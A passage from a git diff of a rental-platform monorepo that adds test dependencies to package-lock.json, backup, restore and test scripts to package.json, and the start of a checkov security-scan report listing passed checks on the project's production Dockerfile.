"4.60.4", + "@rollup/rollup-linux-ppc64-musl": "4.60.4", + "@rollup/rollup-linux-riscv64-gnu": "4.60.4", + "@rollup/rollup-linux-riscv64-musl": "4.60.4", + "@rollup/rollup-linux-s390x-gnu": "4.60.4", + "@rollup/rollup-linux-x64-gnu": "4.60.4", + "@rollup/rollup-linux-x64-musl": "4.60.4", + "@rollup/rollup-openbsd-x64": "4.60.4", + "@rollup/rollup-openharmony-arm64": "4.60.4", + "@rollup/rollup-win32-arm64-msvc": "4.60.4", + "@rollup/rollup-win32-ia32-msvc": "4.60.4", + "@rollup/rollup-win32-x64-gnu": "4.60.4", + "@rollup/rollup-win32-x64-msvc": "4.60.4", + "fsevents": "~2.3.2" + } + }, + "node_modules/rollup/node_modules/@types/estree": { + "version": "1.0.8", + "resolved": "https://registry.npmjs.org/@types/estree/-/estree-1.0.8.tgz", + "integrity": "sha512-dWHzHa2WqEXI/O1E9OjrocMTKJl2mSrEolh1Iomrv6U+JuNwaHXsXx9bLu5gG7BUWFIN0skIQJQ/L1rIex4X6w==", + "dev": true, + "license": "MIT" + }, "node_modules/run-parallel": { "version": "1.2.0", "resolved": "https://registry.npmjs.org/run-parallel/-/run-parallel-1.2.0.tgz", @@ -7534,6 +9015,13 @@ "url": "https://github.com/sponsors/ljharb" } }, + "node_modules/siginfo": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/siginfo/-/siginfo-2.0.0.tgz", + "integrity": "sha512-ybx0WO1/8bSBLEWXZvEd7gMW3Sn3JFlW3TvX1nREbDLRNQNaeNN8WK0meBwPdAaOI7TtRRRJn/Es1zhrrCHu7g==", + "dev": true, + "license": "ISC" + }, "node_modules/signal-exit": { "version": "4.1.0", "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-4.1.0.tgz", @@ -7641,6 +9129,13 @@ "source-map": "^0.6.0" } }, + "node_modules/stackback": { + "version": "0.0.2", + "resolved": "https://registry.npmjs.org/stackback/-/stackback-0.0.2.tgz", + "integrity": "sha512-1XMJE5fQo1jGH6Y/7ebnwPOBEkIEnT4QF32d5R1+VXdXveM0IBMJt8zfaxX1P3QhVwrYe+576+jkANtSS2mBbw==", + "dev": true, + "license": "MIT" + }, "node_modules/standard-as-callback": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/standard-as-callback/-/standard-as-callback-2.1.0.tgz", @@ -7656,6 +9151,13 @@ "node": ">= 0.8" } }, + "node_modules/std-env": { + "version": "3.10.0", + "resolved": "https://registry.npmjs.org/std-env/-/std-env-3.10.0.tgz", + "integrity": "sha512-5GS12FdOZNliM5mAOxFRg7Ir0pWz8MdpYm6AY6VPkGpbA7ZzmbzNcBJQ0GPvvyWgcY7QAhCgf9Uy89I03faLkg==", + "dev": true, + "license": "MIT" + }, "node_modules/stream-events": { "version": "1.0.5", "resolved": "https://registry.npmjs.org/stream-events/-/stream-events-1.0.5.tgz", @@ -7766,6 +9268,19 @@ "node": ">=4" } }, + "node_modules/strip-final-newline": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-3.0.0.tgz", + "integrity": "sha512-dOESqjYr96iWYylGObzd39EuNTa5VJxyvVAEm5Jnh7KGo75V43Hk1odPQkNDyXNmUR6k+gEiDVXnjB8HJ3crXw==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, "node_modules/strip-json-comments": { "version": "3.1.1", "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", @@ -7779,6 +9294,26 @@ "url": "https://github.com/sponsors/sindresorhus" } }, + "node_modules/strip-literal": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/strip-literal/-/strip-literal-2.1.1.tgz", + "integrity": "sha512-631UJ6O00eNGfMiWG78ck80dfBab8X6IVFB51jZK5Icd7XAs60Z5y7QdSd/wGIklnWvRbUNloVzhOKKmutxQ6Q==", + "dev": true, + "license": "MIT", + "dependencies": { + "js-tokens": "^9.0.1" + }, + "funding": { + "url": "https://github.com/sponsors/antfu" + } + }, + "node_modules/strip-literal/node_modules/js-tokens": { + "version": "9.0.1", + "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-9.0.1.tgz", + "integrity": "sha512-mxa9E9ITFOt0ban3j6L5MpjwegGz6lBQmM1IJkWeBZGcMxto50+eWdjC/52xDbS2vy0k7vIMK0Fe2wfL9OQSpQ==", + "dev": true, + "license": "MIT" + }, "node_modules/strnum": { "version": "2.2.3", "resolved": "https://registry.npmjs.org/strnum/-/strnum-2.2.3.tgz", @@ -7853,6 +9388,82 @@ "node": ">= 6" } }, + "node_modules/superagent": { + "version": "10.3.0", + "resolved": "https://registry.npmjs.org/superagent/-/superagent-10.3.0.tgz", + "integrity": "sha512-B+4Ik7ROgVKrQsXTV0Jwp2u+PXYLSlqtDAhYnkkD+zn3yg8s/zjA2MeGayPoY/KICrbitwneDHrjSotxKL+0XQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "component-emitter": "^1.3.1", + "cookiejar": "^2.1.4", + "debug": "^4.3.7", + "fast-safe-stringify": "^2.1.1", + "form-data": "^4.0.5", + "formidable": "^3.5.4", + "methods": "^1.1.2", + "mime": "2.6.0", + "qs": "^6.14.1" + }, + "engines": { + "node": ">=14.18.0" + } + }, + "node_modules/superagent/node_modules/form-data": { + "version": "4.0.5", + "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.5.tgz", + "integrity": "sha512-8RipRLol37bNs2bhoV67fiTEvdTrbMUYcFTiy3+wuuOnUog2QBHCZWXDRijWQfAkhBj2Uf5UnVaiWwA5vdd82w==", + "dev": true, + "license": "MIT", + "dependencies": { + "asynckit": "^0.4.0", + "combined-stream": "^1.0.8", + "es-set-tostringtag": "^2.1.0", + "hasown": "^2.0.2", + "mime-types": "^2.1.12" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/superagent/node_modules/mime": { + "version": "2.6.0", + "resolved": "https://registry.npmjs.org/mime/-/mime-2.6.0.tgz", + "integrity": "sha512-USPkMeET31rOMiarsBNIHZKLGgvKc/LrjofAnBlOttf5ajRvqiRA8QsenbcooctK6d6Ts6aqZXBA+XbkKthiQg==", + "dev": true, + "license": "MIT", + "bin": { + "mime": "cli.js" + }, + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/supertest": { + "version": "7.2.2", + "resolved": "https://registry.npmjs.org/supertest/-/supertest-7.2.2.tgz", + "integrity": "sha512-oK8WG9diS3DlhdUkcFn4tkNIiIbBx9lI2ClF8K+b2/m8Eyv47LSawxUzZQSNKUrVb2KsqeTDCcjAAVPYaSLVTA==", + "dev": true, + "license": "MIT", + "dependencies": { + "cookie-signature": "^1.2.2", + "methods": "^1.1.2", + "superagent": "^10.3.0" + }, + "engines": { + "node": ">=14.18.0" + } + }, + "node_modules/supertest/node_modules/cookie-signature": { + "version": "1.2.2", + "resolved": "https://registry.npmjs.org/cookie-signature/-/cookie-signature-1.2.2.tgz", + "integrity": "sha512-D76uU73ulSXrD1UXF4KE2TMxVVwhsnCgfAyTg9k8P6KGZjlXKrOLe4dJQKI3Bxi5wjesZoFXJWElNWBjPZMbhg==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=6.6.0" + } + }, "node_modules/supports-color": { "version": "7.2.0", "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", @@ -8028,6 +9639,13 @@ "integrity": "sha512-+FbBPE1o9QAYvviau/qC5SE3caw21q3xkvWKBtja5vgqOWIHHJ3ioaq1VPfn/Szqctz2bU/oYeKd9/z5BL+PVg==", "license": "MIT" }, + "node_modules/tinybench": { + "version": "2.9.0", + "resolved": "https://registry.npmjs.org/tinybench/-/tinybench-2.9.0.tgz", + "integrity": "sha512-0+DUvqWMValLmha6lr4kD8iAMK1HzV0/aKnCtWb9v9641TnP/MFb7Pc2bxoxQjTXAErryXVgUOfv2YqNllqGeg==", + "dev": true, + "license": "MIT" + }, "node_modules/tinyglobby": { "version": "0.2.16", "resolved": "https://registry.npmjs.org/tinyglobby/-/tinyglobby-0.2.16.tgz", @@ -8073,6 +9691,26 @@ "url": "https://github.com/sponsors/jonschlinkert" } }, + "node_modules/tinypool": { + "version": "0.8.4", + "resolved": "https://registry.npmjs.org/tinypool/-/tinypool-0.8.4.tgz", + "integrity": "sha512-i11VH5gS6IFeLY3gMBQ00/MmLncVP7JLXOw1vlgkytLmJK7QnEr7NXf0LBdxfmNPAeyetukOk0bOYrJrFGjYJQ==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=14.0.0" + } + }, + "node_modules/tinyspy": { + "version": "2.2.1", + "resolved": "https://registry.npmjs.org/tinyspy/-/tinyspy-2.2.1.tgz", + "integrity": "sha512-KYad6Vy5VDWV4GH3fjpseMQ/XU2BhIYP7Vzd0LG44qRWm/Yt2WCOTicFdvmgo6gWaqooMQCawTtILVQJupKu7A==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=14.0.0" + } + }, "node_modules/to-regex-range": { "version": "5.0.1", "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", @@ -8416,6 +10054,16 @@ "node": ">= 0.8.0" } }, + "node_modules/type-detect": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.1.0.tgz", + "integrity": "sha512-Acylog8/luQ8L7il+geoSxhEkazvkslg7PSNKOX59mbB9cOveP5aq9h74Y7YU8yDpJwetzQQrfIwtf4Wp4LKcw==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=4" + } + }, "node_modules/type-fest": { "version": "0.20.2", "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.20.2.tgz", @@ -8462,6 +10110,13 @@ "node": ">=14.17" } }, + "node_modules/ufo": { + "version": "1.6.4", + "resolved": "https://registry.npmjs.org/ufo/-/ufo-1.6.4.tgz", + "integrity": "sha512-JFNbkD1Svwe0KvGi8GOeLcP4kAWQ609twvCdcHxq1oSL8svv39ZuSvajcD8B+5D0eL4+s1Is2D/O6KN3qcTeRA==", + "dev": true, + "license": "MIT" + }, "node_modules/undici-types": { "version": "6.21.0", "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.21.0.tgz", @@ -8610,6 +10265,66 @@ "d3-timer": "^3.0.1" } }, + "node_modules/vite": { + "version": "5.4.21", + "resolved": "https://registry.npmjs.org/vite/-/vite-5.4.21.tgz", + "integrity": "sha512-o5a9xKjbtuhY6Bi5S3+HvbRERmouabWbyUcpXXUA1u+GNUKoROi9byOJ8M0nHbHYHkYICiMlqxkg1KkYmm25Sw==", + "dev": true, + "license": "MIT", + "dependencies": { + "esbuild": "^0.21.3", + "postcss": "^8.4.43", + "rollup": "^4.20.0" + }, + "bin": { + "vite": "bin/vite.js" + }, + "engines": { + "node": "^18.0.0 || >=20.0.0" + }, + "funding": { + "url": "https://github.com/vitejs/vite?sponsor=1" + }, + "optionalDependencies": { + "fsevents": "~2.3.3" + }, + "peerDependencies": { + "@types/node": "^18.0.0 || >=20.0.0", + "less": "*", + "lightningcss": "^1.21.0", + "sass": "*", + "sass-embedded": "*", + "stylus": "*", + "sugarss": "*", + "terser": "^5.4.0" + }, + "peerDependenciesMeta": { + "@types/node": { + "optional": true + }, + "less": { + "optional": true + }, + "lightningcss": { + "optional": true + }, + "sass": { + "optional": true + }, + "sass-embedded": { + "optional": true + }, + "stylus": { + "optional": true + }, + "sugarss": { + "optional": true + }, + "terser": { + "optional": true + } + } + }, "node_modules/vite-compatible-readable-stream": { "version": "3.6.1", "resolved": "https://registry.npmjs.org/vite-compatible-readable-stream/-/vite-compatible-readable-stream-3.6.1.tgz", @@ -8624,6 +10339,95 @@ "node": ">= 6" } }, + "node_modules/vite-node": { + "version": "1.6.1", + "resolved": "https://registry.npmjs.org/vite-node/-/vite-node-1.6.1.tgz", + "integrity": "sha512-YAXkfvGtuTzwWbDSACdJSg4A4DZiAqckWe90Zapc/sEX3XvHcw1NdurM/6od8J207tSDqNbSsgdCacBgvJKFuA==", + "dev": true, + "license": "MIT", + "dependencies": { + "cac": "^6.7.14", + "debug": "^4.3.4", + "pathe": "^1.1.1", + "picocolors": "^1.0.0", + "vite": "^5.0.0" + }, + "bin": { + "vite-node": "vite-node.mjs" + }, + "engines": { + "node": "^18.0.0 || >=20.0.0" + }, + "funding": { + "url": "https://opencollective.com/vitest" + } + }, + "node_modules/vitest": { + "version": "1.6.1", + "resolved": "https://registry.npmjs.org/vitest/-/vitest-1.6.1.tgz", + "integrity": "sha512-Ljb1cnSJSivGN0LqXd/zmDbWEM0RNNg2t1QW/XUhYl/qPqyu7CsqeWtqQXHVaJsecLPuDoak2oJcZN2QoRIOag==", + "dev": true, + "license": "MIT", + "dependencies": { + "@vitest/expect": "1.6.1", + "@vitest/runner": "1.6.1", + "@vitest/snapshot": "1.6.1", + "@vitest/spy": "1.6.1", + "@vitest/utils": "1.6.1", + "acorn-walk": "^8.3.2", + "chai": "^4.3.10", + "debug": "^4.3.4", + "execa": "^8.0.1", + "local-pkg": "^0.5.0", + "magic-string": "^0.30.5", + "pathe": "^1.1.1", + "picocolors": "^1.0.0", + "std-env": "^3.5.0", + "strip-literal": "^2.0.0", + "tinybench": "^2.5.1", + "tinypool": "^0.8.3", + "vite": "^5.0.0", + "vite-node": "1.6.1", + "why-is-node-running": "^2.2.2" + }, + "bin": { + "vitest": "vitest.mjs" + }, + "engines": { + "node": "^18.0.0 || >=20.0.0" + }, + "funding": { + "url": "https://opencollective.com/vitest" + }, + "peerDependencies": { + "@edge-runtime/vm": "*", + "@types/node": "^18.0.0 || >=20.0.0", + "@vitest/browser": "1.6.1", + "@vitest/ui": "1.6.1", + "happy-dom": "*", + "jsdom": "*" + }, + "peerDependenciesMeta": { + "@edge-runtime/vm": { + "optional": true + }, + "@types/node": { + "optional": true + }, + "@vitest/browser": { + "optional": true + }, + "@vitest/ui": { + "optional": true + }, + "happy-dom": { + "optional": true + }, + "jsdom": { + "optional": true + } + } + }, "node_modules/webidl-conversions": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/webidl-conversions/-/webidl-conversions-3.0.1.tgz", @@ -8684,6 +10488,23 @@ "integrity": "sha512-iBdZ57RDvnOR9AGBhML2vFZf7h8vmBjhoaZqODJBFWHVtKkDmKuHai3cx5PgVMrX5YDNp27AofYbAwctSS+vhQ==", "license": "ISC" }, + "node_modules/why-is-node-running": { + "version": "2.3.0", + "resolved": "https://registry.npmjs.org/why-is-node-running/-/why-is-node-running-2.3.0.tgz", + "integrity": "sha512-hUrmaWBdVDcxvYqnyh09zunKzROWjbZTiNy8dBEjkS7ehEDQibXJ7XvlmtbwuTclUiIyN+CyXQD4Vmko8fNm8w==", + "dev": true, + "license": "MIT", + "dependencies": { + "siginfo": "^2.0.0", + "stackback": "0.0.2" + }, + "bin": { + "why-is-node-running": "cli.js" + }, + "engines": { + "node": ">=8" + } + }, "node_modules/word-wrap": { "version": "1.2.5", "resolved": "https://registry.npmjs.org/word-wrap/-/word-wrap-1.2.5.tgz", diff --git a/package.json b/package.json index 20acb85..3ec8aba 100644 --- a/package.json +++ b/package.json @@ -23,6 +23,8 @@ "docker:prod:start:pgmanage": "bash scripts/docker-prod-up-pgmanage.sh", "docker:prod:up": "docker compose -p rentaldrivego-prod --env-file .env.docker.production -f docker-compose.production.yml up --build -d", "docker:prod:down": "docker compose -p rentaldrivego-prod --env-file .env.docker.production -f docker-compose.production.yml down", + "docker:prod:backup": "bash scripts/docker-prod-backup.sh", + "docker:prod:restore": "bash scripts/docker-prod-restore.sh", "docker:prod:logs": "docker compose -p rentaldrivego-prod --env-file .env.docker.production -f docker-compose.production.yml logs -f", "docker:prod:logs:api": "docker compose -p rentaldrivego-prod --env-file .env.docker.production -f docker-compose.production.yml logs -f api", "clerk:keys": "bash scripts/setup-clerk-keys.sh", @@ -32,7 +34,9 @@ "db:migrate": "turbo db:migrate", "db:seed": "turbo db:seed", "db:seed:admin": "npm run db:seed --workspace @rentaldrivego/database", - "db:studio": "cd packages/database && npx prisma studio" + "db:studio": "cd packages/database && npx prisma studio", + "test:api": "npm run test --workspace @rentaldrivego/api", + "test:api:integration": "npm run test:integration --workspace @rentaldrivego/api" }, "devDependencies": { "turbo": "^1.13.0", diff --git a/results/.scan_metadata.json b/results/.scan_metadata.json new file mode 100644 index 0000000..2b4c8a5 --- /dev/null +++ b/results/.scan_metadata.json @@ -0,0 +1 @@ +{"profile": null, "tools": ["trufflehog", "semgrep", "syft", "trivy", "checkov", "hadolint", "zap"], "timestamp": "2026-05-21T06:36:09.492620+00:00", "target_count": 1} \ No newline at end of file diff --git a/results/individual-repos/scan/checkov.json b/results/individual-repos/scan/checkov.json new file mode 100644 index 0000000..293079c --- /dev/null +++ b/results/individual-repos/scan/checkov.json @@ -0,0 +1,15120 @@ +[ + { + "check_type": "dockerfile", + "results": { + "passed_checks": [ + { + "check_id": "CKV_DOCKER_9", + "bc_check_id": "BC_DKR_NETWORKING_1", + "check_name": "Ensure that APT isn't used", + "check_result": { + "result": "PASSED", + "results_configuration": null + }, + "code_block": [ + [ + 1, + "FROM node:20-bookworm AS builder\n" + ], + [ + 2, + "\n" + ], + [ + 3, + "WORKDIR /app\n" + ], + [ + 4, + "\n" + ], + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ], + [ + 6, + "\n" + ], + [ + 7, + "COPY package.json package-lock.json turbo.json tsconfig.base.json ./\n" + ], + [ + 8, + "COPY apps ./apps\n" + ], + [ + 9, + "COPY packages ./packages\n" + ], + [ + 10, + "\n" + ], + [ + 11, + "# NEXT_PUBLIC_* vars must be present at build time \u2014 they are inlined into JS bundles\n" + ], + [ + 12, + "ARG NEXT_PUBLIC_API_URL\n" + ], + [ + 13, + "ARG NEXT_PUBLIC_MARKETPLACE_URL\n" + ], + [ + 14, + "ARG NEXT_PUBLIC_DASHBOARD_URL\n" + ], + [ + 15, + "ARG NEXT_PUBLIC_ADMIN_URL\n" + ], + [ + 16, + "ENV NEXT_PUBLIC_API_URL=$NEXT_PUBLIC_API_URL \\\n" + ], + [ + 17, + " NEXT_PUBLIC_MARKETPLACE_URL=$NEXT_PUBLIC_MARKETPLACE_URL \\\n" + ], + [ + 18, + " NEXT_PUBLIC_DASHBOARD_URL=$NEXT_PUBLIC_DASHBOARD_URL \\\n" + ], + [ + 19, + " NEXT_PUBLIC_ADMIN_URL=$NEXT_PUBLIC_ADMIN_URL\n" + ], + [ + 20, + "\n" + ], + [ + 21, + "RUN npm install\n" + ], + [ + 22, + "RUN npm run db:generate\n" + ], + [ + 23, + "RUN npm run build\n" + ], + [ + 24, + "\n" + ], + [ + 25, + "FROM node:20-bookworm AS runner\n" + ], + [ + 26, + "\n" + ], + [ + 27, + "WORKDIR /app\n" + ], + [ + 28, + "\n" + ], + [ + 29, + "ENV NODE_ENV=production\n" + ], + [ + 30, + "\n" + ], + [ + 31, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ], + [ + 32, + "\n" + ], + [ + 33, + "COPY --from=builder /app/package.json /app/package-lock.json /app/turbo.json /app/tsconfig.base.json ./\n" + ], + [ + 34, + "COPY --from=builder /app/node_modules ./node_modules\n" + ], + [ + 35, + "COPY --from=builder /app/apps ./apps\n" + ], + [ + 36, + "COPY --from=builder /app/packages ./packages\n" + ], + [ + 37, + "\n" + ], + [ + 38, + "EXPOSE 3000 3001 3002 4000\n" + ], + [ + 39, + "\n" + ], + [ + 40, + "CMD [\"npm\", \"run\", \"start\", \"--workspace\", \"@rentaldrivego/api\"]" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 1, + 40 + ], + "resource": "/Dockerfile.production.", + "evaluations": null, + "check_class": "checkov.dockerfile.checks.RunUsingAPT", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-apt-is-not-used", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV_DOCKER_5", + "bc_check_id": "BC_DKR_4", + "check_name": "Ensure update instructions are not use alone in the Dockerfile", + "check_result": { + "result": "PASSED", + "results_configuration": null + }, + "code_block": [ + [ + 1, + "FROM node:20-bookworm AS builder\n" + ], + [ + 2, + "\n" + ], + [ + 3, + "WORKDIR /app\n" + ], + [ + 4, + "\n" + ], + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ], + [ + 6, + "\n" + ], + [ + 7, + "COPY package.json package-lock.json turbo.json tsconfig.base.json ./\n" + ], + [ + 8, + "COPY apps ./apps\n" + ], + [ + 9, + "COPY packages ./packages\n" + ], + [ + 10, + "\n" + ], + [ + 11, + "# NEXT_PUBLIC_* vars must be present at build time \u2014 they are inlined into JS bundles\n" + ], + [ + 12, + "ARG NEXT_PUBLIC_API_URL\n" + ], + [ + 13, + "ARG NEXT_PUBLIC_MARKETPLACE_URL\n" + ], + [ + 14, + "ARG NEXT_PUBLIC_DASHBOARD_URL\n" + ], + [ + 15, + "ARG NEXT_PUBLIC_ADMIN_URL\n" + ], + [ + 16, + "ENV NEXT_PUBLIC_API_URL=$NEXT_PUBLIC_API_URL \\\n" + ], + [ + 17, + " NEXT_PUBLIC_MARKETPLACE_URL=$NEXT_PUBLIC_MARKETPLACE_URL \\\n" + ], + [ + 18, + " NEXT_PUBLIC_DASHBOARD_URL=$NEXT_PUBLIC_DASHBOARD_URL \\\n" + ], + [ + 19, + " NEXT_PUBLIC_ADMIN_URL=$NEXT_PUBLIC_ADMIN_URL\n" + ], + [ + 20, + "\n" + ], + [ + 21, + "RUN npm install\n" + ], + [ + 22, + "RUN npm run db:generate\n" + ], + [ + 23, + "RUN npm run build\n" + ], + [ + 24, + "\n" + ], + [ + 25, + "FROM node:20-bookworm AS runner\n" + ], + [ + 26, + "\n" + ], + [ + 27, + "WORKDIR /app\n" + ], + [ + 28, + "\n" + ], + [ + 29, + "ENV NODE_ENV=production\n" + ], + [ + 30, + "\n" + ], + [ + 31, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ], + [ + 32, + "\n" + ], + [ + 33, + "COPY --from=builder /app/package.json /app/package-lock.json /app/turbo.json /app/tsconfig.base.json ./\n" + ], + [ + 34, + "COPY --from=builder /app/node_modules ./node_modules\n" + ], + [ + 35, + "COPY --from=builder /app/apps ./apps\n" + ], + [ + 36, + "COPY --from=builder /app/packages ./packages\n" + ], + [ + 37, + "\n" + ], + [ + 38, + "EXPOSE 3000 3001 3002 4000\n" + ], + [ + 39, + "\n" + ], + [ + 40, + "CMD [\"npm\", \"run\", \"start\", \"--workspace\", \"@rentaldrivego/api\"]" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 1, + 40 + ], + "resource": "/Dockerfile.production.", + "evaluations": null, + "check_class": "checkov.dockerfile.checks.UpdateNotAlone", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-update-instructions-are-not-used-alone-in-the-dockerfile", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV_DOCKER_11", + "bc_check_id": "BC_DKR_GENERAL_9", + "check_name": "Ensure From Alias are unique for multistage builds.", + "check_result": { + "result": "PASSED", + "results_configuration": null + }, + "code_block": [ + [ + 1, + "FROM node:20-bookworm AS builder\n" + ], + [ + 2, + "\n" + ], + [ + 3, + "WORKDIR /app\n" + ], + [ + 4, + "\n" + ], + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ], + [ + 6, + "\n" + ], + [ + 7, + "COPY package.json package-lock.json turbo.json tsconfig.base.json ./\n" + ], + [ + 8, + "COPY apps ./apps\n" + ], + [ + 9, + "COPY packages ./packages\n" + ], + [ + 10, + "\n" + ], + [ + 11, + "# NEXT_PUBLIC_* vars must be present at build time \u2014 they are inlined into JS bundles\n" + ], + [ + 12, + "ARG NEXT_PUBLIC_API_URL\n" + ], + [ + 13, + "ARG NEXT_PUBLIC_MARKETPLACE_URL\n" + ], + [ + 14, + "ARG NEXT_PUBLIC_DASHBOARD_URL\n" + ], + [ + 15, + "ARG NEXT_PUBLIC_ADMIN_URL\n" + ], + [ + 16, + "ENV NEXT_PUBLIC_API_URL=$NEXT_PUBLIC_API_URL \\\n" + ], + [ + 17, + " NEXT_PUBLIC_MARKETPLACE_URL=$NEXT_PUBLIC_MARKETPLACE_URL \\\n" + ], + [ + 18, + " NEXT_PUBLIC_DASHBOARD_URL=$NEXT_PUBLIC_DASHBOARD_URL \\\n" + ], + [ + 19, + " NEXT_PUBLIC_ADMIN_URL=$NEXT_PUBLIC_ADMIN_URL\n" + ], + [ + 20, + "\n" + ], + [ + 21, + "RUN npm install\n" + ], + [ + 22, + "RUN npm run db:generate\n" + ], + [ + 23, + "RUN npm run build\n" + ], + [ + 24, + "\n" + ], + [ + 25, + "FROM node:20-bookworm AS runner\n" + ], + [ + 26, + "\n" + ], + [ + 27, + "WORKDIR /app\n" + ], + [ + 28, + "\n" + ], + [ + 29, + "ENV NODE_ENV=production\n" + ], + [ + 30, + "\n" + ], + [ + 31, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ], + [ + 32, + "\n" + ], + [ + 33, + "COPY --from=builder /app/package.json /app/package-lock.json /app/turbo.json /app/tsconfig.base.json ./\n" + ], + [ + 34, + "COPY --from=builder /app/node_modules ./node_modules\n" + ], + [ + 35, + "COPY --from=builder /app/apps ./apps\n" + ], + [ + 36, + "COPY --from=builder /app/packages ./packages\n" + ], + [ + 37, + "\n" + ], + [ + 38, + "EXPOSE 3000 3001 3002 4000\n" + ], + [ + 39, + "\n" + ], + [ + 40, + "CMD [\"npm\", \"run\", \"start\", \"--workspace\", \"@rentaldrivego/api\"]" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 1, + 40 + ], + "resource": "/Dockerfile.production.", + "evaluations": null, + "check_class": "checkov.dockerfile.checks.AliasIsUnique", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-docker-from-alias-is-unique-for-multistage-builds", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV_DOCKER_7", + "bc_check_id": "BC_DKR_7", + "check_name": "Ensure the base image uses a non latest version tag", + "check_result": { + "result": "PASSED", + "results_configuration": [ + { + "instruction": "FROM", + "startline": 24, + "endline": 24, + "content": "FROM node:20-bookworm AS runner\n", + "value": "node:20-bookworm AS runner" + } + ] + }, + "code_block": [ + [ + 25, + "FROM node:20-bookworm AS runner\n" + ] + ], + "file_path": "/Dockerfile.production", + "file_abs_path": "/scan/Dockerfile.production", + "repo_file_path": "/Dockerfile.production", + "file_line_range": [ + 25, + 25 + ], + "resource": "/Dockerfile.production.FROM", + "evaluations": null, + "check_class": "checkov.dockerfile.checks.ReferenceLatestTag", + "fixed_definition": null, + "entity_tags": null, + "caller_file_path": null, + "caller_file_line_range": null, + "resource_address": null, + "severity": null, + "bc_category": null, + "benchmarks": null, + "description": null, + "short_description": null, + "vulnerability_details": null, + "connected_node": null, + "guideline": "https://docs.prismacloud.io/en/enterprise-edition/policy-reference/docker-policies/docker-policy-index/ensure-the-base-image-uses-a-non-latest-version-tag", + "details": [], + "check_len": null, + "definition_context_file_path": null + }, + { + "check_id": "CKV_DOCKER_1", + "bc_check_id": "BC_DKR_1", + "check_name": "Ensure port 22 is not exposed", + "check_result": { + "result": "PASSED", + "results_configuration": null + }, + "code_block": [ + [ + 1, + "FROM node:20-bookworm AS builder\n" + ], + [ + 2, + "\n" + ], + [ + 3, + "WORKDIR /app\n" + ], + [ + 4, + "\n" + ], + [ + 5, + "RUN corepack enable && corepack prepare npm@10.5.0 --activate\n" + ], + [ + 6, + "\n" + ], + [ + 7, + "COPY package.json package-lock.json turbo.json tsconfig.base.json ./\n" + ], + [ + 8, + "COPY apps ./apps\n" + ], + [ + 9, + "COPY packages ./packages\n" + ], + [ + 10, + "\n" + ], + [ + 11, + "# NEXT_PUBLIC_* vars must be present at build time \u2014 they are inlined into JS bundles\n" + ], + [ + 12, + "ARG NEXT_PUBLIC_API_URL\n" + ], + [ + 13, + "ARG NEXT_PUBLIC_MARKETPLACE_URL\n" + ], + [ + 14, + "ARG NEXT_PUBLIC_DASHBOARD_URL\n" + ], + [ + 15, + "ARG NEXT_PUBLIC_ADMIN_URL\n" + ], + [ + 16, + "ENV NEXT_PUBLIC_API_URL=$NEXT_PUBLIC_API_URL \\\n" + ], + [ + 17, + " NEXT_PUBLIC_MARKETPLACE_URL=$NEXT_PUBLIC_MARKETPLACE_URL \\\n" + ], + [ + 18, + " NEXT_PUBLIC_DASHBOARD_URL=$NEXT_PUBLIC_DASHBOARD_URL \\\n" + ], + [ + 19, + " 